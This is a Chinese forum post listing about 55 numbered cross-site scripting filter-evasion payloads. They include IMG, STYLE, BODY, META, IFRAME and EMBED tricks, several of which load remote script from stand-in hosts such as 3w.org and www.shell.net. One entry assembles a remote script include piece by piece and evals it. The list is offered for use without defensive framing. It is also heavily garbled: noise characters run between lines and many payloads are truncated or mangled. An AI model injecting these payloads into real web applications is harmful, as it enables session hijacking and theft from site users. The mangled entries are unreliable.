(1)普通的XSS JavaScript注入
1 W* @9 M4 q& M3 \, y9 W" n<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
* L5 p: A7 _) `; [+ o(99)另类弹框
/ Y9 D7 @9 P# E" y; C<q/oncut=alert()>1& o" H* g, ]: v% i! ~
<s/onclick=alert()>b
* p* @! ~8 h# C( [! @1 v0 \ <XSS=" onclick="alert(1)//">clickme</SSX=">
& J" ?! t$ l+ l$ } <zzz onclick=alert`1`>clickme</zzz>
( ^4 o' s8 X# A. Z0 p0 g <a onclick=alert`1`>clickme</a>! T& F/ L6 k, Z5 V
<a=">clickme</a=">
$ `: G! S$ }7 s5 F) Z<a=">clickme</a>! v2 p6 k6 {% e
<z=">clickme</z=">' X4 a+ \6 [2 }7 z8 [
<z onclick=alert`1`>clickme</z>
& a- Q( W7 O6 }3 S% g! ~: _, D
8 r& P ]; u% N9 y(2)IMG标签XSS使用JavaScript命令& H/ W4 { C5 P, P" D
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>/ X# a' C4 g" F& D+ }1 W
, k8 |$ L' I4 T: m" f0 V
(3)IMG标签无分号无引号
+ h5 P9 t- l* L& r<IMG SRC=javascript:alert(‘XSS’)>" u3 k: G0 ~ k H
8 e' Y1 `& n4 {) N# |9 g
(4)IMG标签大小写不敏感! a4 f! @* u% B: u% _
<IMG SRC=JaVaScRiPt:alert(‘XSS’)>
3 {5 x; A1 E" j! ?' k! {! J
5 t$ ]2 B0 u I6 Q& K(5)HTML编码(必须有分号)' l3 N4 u, u. n6 l' A; b+ D8 @
<IMG SRC=javascript:alert(“XSS”)>: z8 \0 Z7 U$ S. M U8 y
7 S4 `0 j; Q4 r( {(6)修正缺陷IMG标签
5 S6 c1 U' D7 Z0 f8 S<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>
+ W, K) p' L4 R. F% p0 b( k' v
(7)formCharCode标签(计算器)
8 p0 z$ ~0 B% W4 C<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
3 k% z# e" D& a0 c
/ \6 ~6 ^, b% N/ y( [(8)UTF-8的Unicode编码(计算器)" o# ^: d' ]) f7 I. G; w( t
<IMG SRC=jav..省略..S')>4 _ g" u6 X" A1 q D
7 y. N `3 _) t(9)7位的UTF-8的Unicode编码是没有分号的(计算器)0 E: ]) j$ }! U! d% I0 e+ [
<IMG SRC=jav..省略..S')># x* H5 P( ^& w, r: a4 B. c9 t
4 O! F/ }; W0 L; t# S: D
(10)十六进制编码也是没有分号(计算器)
3 N" g0 g8 {( }4 s- B6 j: b6 Q& ^<IMG SRC=\'#\'" /span>
& h! _4 V" _% `0 Z w+ U g9 r* D+ O- `+ W
(11)嵌入式标签,将Javascript分开4 H$ o, {2 x) J/ F) R
<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>; D* {" D0 A3 a- D
" e, O: v, J4 b; g
(12)嵌入式编码标签,将Javascript分开1 G$ T+ w% w8 {: }
<IMG SRC=\'#\'" ascript:alert(‘XSS’);”> ~& ?/ l+ Z& v& Q" _) ]2 C
$ n- M/ P6 ]3 P/ Z) D% r3 M
(13)嵌入式换行符
: N y1 H6 o0 g, Y- y7 h<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>
2 `0 G1 q& b& A5 W* ^9 n- i- C Y3 w. ?5 f0 f$ y2 o' N
(14)嵌入式回车/ H& m$ ^' ?! K
<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>& @9 c; j% I; A) g
- `' v! A1 Z# f" H" n H(15)嵌入式多行注入JavaScript,这是XSS极端的例子* c& R2 U. u/ V* Y: w
<IMG SRC=\'#\'" /span>
' ?( W+ y+ d V( \7 X4 k9 I
8 F0 W* L% \( t6 Q% r" c4 x l(16)解决限制字符(要求同页面)
" `$ L. c7 f7 c3 Y' X: D0 [9 a3 ^<script>z=’document.’</script>
/ Y6 i: J; D3 T<script>z=z+’write(“‘</script>8 ]1 E, g7 i5 }4 r5 e/ ?5 Q1 G; m6 Z
<script>z=z+’<script’</script>
" u# e2 L" e0 R7 s<script>z=z+’ src=ht’</script>
& s8 q7 b2 ^, s! ~5 T2 ?<script>z=z+’tp://ww’</script>
7 m" }5 M& Z& T$ i% I<script>z=z+’w.shell’</script>
9 t2 W/ X! ~+ h, \& F! i<script>z=z+’.net/1.’</script>, ^% y# s# f" |) D( @" b$ _8 q
<script>z=z+’js></sc’</script>
0 n2 m% b3 U, G# a* ?9 |% D& o! Q<script>z=z+’ript>”)’</script>
2 D/ ^. s8 U9 D0 {+ Z& c' p<script>eval_r(z)</script>2 l7 W3 H* o- |
) T+ k6 p* B6 t" m* |(17)空字符
& x# p3 P! S0 ~6 `perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out( C }5 X' ?3 Z% Q' T4 O; H
; j& |" v3 R& Y( A3 p/ Q
(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用) K' t6 S& n1 Z+ B# D2 k* ]
perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out
% W: n! E2 t) I7 Q. e" L# |9 }+ a
8 Z( b' ^8 Q- c6 t9 v(19)Spaces和meta前的IMG标签$ F4 E* Y3 }! a3 u6 ?, k
<IMG SRC=\'#\'" � javascript:alert(‘XSS’);”>
0 ^# t4 L2 h1 r1 ]& ^
; ?: q" X6 N- n: Z(20)Non-alpha-non-digit XSS2 K" R: {$ s) C* l; d/ ^
<SCRIPT/XSS SRC=\'#\'" /span>http://3w.org/XSS/xss.js”></SCRIPT>3 N! b" G* U& h' E9 U
$ }: a. w e) O6 h& O0 r/ O(21)Non-alpha-non-digit XSS to 2" G) ^$ W% K8 F" z
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>- x( g: x9 T1 i3 l+ `& X
' J' d Q0 @" F4 X1 K9 }2 j
(22)Non-alpha-non-digit XSS to 3
6 Y8 [/ E2 o8 C6 F1 n2 t<SCRIPT/SRC=\'#\'" /span>http://3w.org/XSS/xss.js”></SCRIPT>
! b* ]% Q& a, h2 j& _; j$ _
! ^0 c0 T, {+ b. a9 \(23)双开括号
$ l* b k. D& o! v8 o i, v J<<SCRIPT>alert(“XSS”);//<</SCRIPT>1 _5 j% ?9 h( _. u* D, F
7 J* m1 B8 Z( |+ h) G# D
(24)无结束脚本标记(仅火狐等浏览器): w% {0 B6 P% w& X% O* t7 D3 F
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>
v( l. a4 T$ w) F( }, f7 \+ k
" |% B) @9 ~2 c# T* Y& R% ^(25)无结束脚本标记2
7 ~ j7 w8 Y: m& Y0 d: U- z; A<SCRIPT SRC=//3w.org/XSS/xss.js>
* A. x+ N, ]+ i5 G: d" n' o0 U# ~4 A
(26)半开的HTML/JavaScript XSS! l" \) G$ o J) J4 K
<IMG SRC=\'#\'" /span>% v; Y6 s- O( P2 ~" x) y
: z$ b: s$ _ A; P6 ]9 P(27)双开角括号
& g8 G, f4 F6 {: m+ J7 r; o<iframe src=http://3w.org/XSS.html <
0 [% {. P& k& |5 u- O K4 X, j2 t( Y1 \- t2 b6 d5 W+ K# X
(28)无单引号 双引号 分号3 t! T) c) f" A1 i/ l3 B" q
<SCRIPT>a=/XSS/
2 A$ e2 i$ O; ~9 ealert(a.source)</SCRIPT>
" {* H* n2 P5 A- W8 i
7 p3 M$ \) Y7 V* F(29)换码过滤的JavaScript0 l# q/ { r) B9 u0 S$ {6 ~( o G' A
\”;alert(‘XSS’);//
7 O3 y9 ~: w. g
3 M& R4 s6 q7 T8 b1 v(30)结束Title标签
. j6 ^5 B8 X. L* B6 _0 i</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>( a# \9 V$ S9 @6 _9 ?: n3 c. ~2 V
0 b. g( m4 p4 f
(31)Input Image
9 Q5 ^% o4 G { O( C% l/ J% v<INPUT SRC=\'#\'" /span>1 r5 C5 [; f+ E# m5 d& O. R
7 O5 ^/ Y1 y- P2 A) O
(32)BODY Image5 K# o, W8 P' k( O) I) Y9 j4 Z
<BODY BACKGROUND=”javascript:alert(‘XSS’)”>, U0 G1 L$ D4 l, U; [& K5 c4 ?6 u
8 H* V& q; a8 i/ w5 [% x& R: j(33)BODY标签
6 b1 S* Z* b1 ?$ y<BODY(‘XSS’)>
' g, o3 S4 U, }( ?3 d+ H B2 Z/ ^8 k0 q
(34)IMG Dynsrc
6 E" n& k2 l' ^( @<IMG DYNSRC=\'#\'" /span>
9 T( k; m0 g7 [5 T$ f3 N" i5 u0 O
6 e$ H0 n% l7 T! Z/ S0 i) s(35)IMG Lowsrc
, c3 |2 l3 U n( L4 _ _# }: }% U<IMG LOWSRC=\'#\'" /span> Z3 U( B7 Z6 {! z( S/ k
& G& L2 ?- O$ }7 {8 C9 W6 u
(36)BGSOUND
, x' p' F* Y4 @' Y<BGSOUND SRC=\'#\'" /span>
! V) M# B6 Q6 w- ~+ i4 U& a; Z+ L- X [* {% d- ~; D$ J
(37)STYLE sheet; c# p- V5 Q+ p. p# N. p
<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>0 Y8 b% K4 @* T, l$ P' ^, j" X! n
^% N# A) @! z/ }) m$ t5 d(38)远程样式表+ N: A6 }- r/ Y/ I/ Z% |
<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>, b, D H, d, s% d, X S
2 R& x# B% v h
(39)List-style-image(列表式)- |8 H7 v- h9 R
<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS3 j/ [4 o" _( E9 R3 X
; v) p5 h8 d6 r+ m4 v(40)IMG VBscript% ^& p* L4 s) N7 h" `
<IMG SRC=\'#\'" /STYLE><UL><LI>XSS, Q. U2 ]7 H* i+ R4 O
& y+ B: B5 p7 j5 N6 R( r% E(41)META链接url1 o# B" j j' R0 @! Q' U
<META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”>1 \7 R" n/ D- E3 r8 o1 `
5 I$ Q+ F+ u1 [2 |(42)Iframe
( G5 n. v% e3 `% A$ A1 R<IFRAME SRC=\'#\'" /IFRAME>( b3 x5 f! ?$ |( l2 i7 K
$ F3 N5 {& F' j" Y(43)Frame
+ A; r! y1 i' o n<FRAMESET><FRAME SRC=\'#\'" /FRAMESET>
+ d7 A# n% B& ]# c7 P" H* u1 c1 F
; W2 w; O4 K' o5 _3 o3 y9 J(44)Table
. ^- [3 \! i8 R; Z) h" `5 z<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>7 u6 c& n4 h1 E4 o K# O0 a/ z
{' }. x* e# W: N1 J4 P
(45)TD
2 x/ X K. ~' b. M. g" |<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>
+ d3 x0 _+ U8 T/ P3 G; _
+ S8 x5 } C# U, W& {0 t(46)DIV background-image& y& q, [+ b# C
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>7 X" O( F ?8 `/ z, p9 M
& l0 q7 I( E; A9 p: J
(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279)
H( M- k/ g8 M; i. M& Y, ^<DIV STYLE=”background-image: url(�javascript:alert(‘XSS’))”>- q# T3 ~( w$ M1 z! \- u
6 D- f9 F- w& A4 Z2 G4 t
(48)DIV expression: Y* a5 ]6 P( K. n
<DIV STYLE=”width: expression_r(alert(‘XSS’));”>
4 A4 X# [! M& W# o( T2 S! g% L: p* y2 ^' ]; J6 @! {
(49)STYLE属性分拆表达 c2 Z6 g% P# h% C
<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>
$ q; S: U. \) o3 K) f
- o+ t! g& | b6 P# Y(50)匿名STYLE(组成:开角号和一个字母开头)
& ]9 K$ o1 X; H$ D8 x: H<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>
3 R. Y. T5 A; q; U1 D( x, E# O. i# h& `/ M- v9 l2 q V
(51)STYLE background-image. q9 a( \8 u. i- L1 [2 p: @ ~/ K
<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>$ g# ]0 G0 ?6 x [1 k3 |: y' y" N
7 x, Q' V: ]3 T5 L8 s3 }(52)IMG STYLE方式
: a' ^( E; w+ B. A) s& texppression(alert(“XSS”))’>& J5 S# G- o0 c4 e
, c7 z- y9 D+ l3 B1 v8 w7 P* Y
(53)STYLE background4 Y/ _3 P q1 N0 b# Z; y, F, _# e% I
<STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>
2 `( _; F# |, p. Z- _( |2 [8 j( t
5 A% m: v0 p2 G. ?$ N7 P! ^(54)BASE
o; ^; D( K) W. g<BASE HREF=”javascript:alert(‘XSS’);//”>
, Y6 |, J. P' C/ y+ R
. ?6 B) C* d' D5 B- Q9 V(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS* c) f7 ~9 m, ^* ]
<EMBED SRC=\'#\'" /span>http://3w.org/XSS/xss.swf” ></EMBED>1 f* ^+ w C' P# V& ]
|
发表于 2016-4-28 10:06:15
收藏
支持
反对